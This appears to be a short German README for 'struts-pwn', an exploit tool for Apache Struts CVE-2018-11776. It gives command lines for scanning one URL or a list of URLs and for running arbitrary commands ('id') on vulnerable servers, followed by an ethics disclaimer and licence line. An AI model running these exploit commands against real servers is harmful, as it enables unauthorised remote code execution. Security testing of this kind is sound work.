
Ein Exploit für Apache Struts CVE-2018-11776
python struts-pwn.py --url 'http://example.com/demo/struts2-showcase/index.action'
python struts-pwn.py --list 'urls.txt'
python struts-pwn.py --exploit --url 'http://example.com/demo/struts2-showcase/index.action' -c 'id'
python struts-pwn.py --exploit --list 'urls.txt' -c 'id'



Dieses Projekt dient ausschließlich Bildungs- und ethischen Testzwecken. Die Verwendung von struts-pwn für Angriffe auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. Es liegt in der Verantwortung des Endbenutzers, alle geltenden lokalen, staatlichen und bundesstaatlichen Gesetze einzuhalten. Die Entwickler übernehmen keine Haftung und sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.
Das Projekt ist unter der MIT-Lizenz lizenziert.
Mazin Ahmed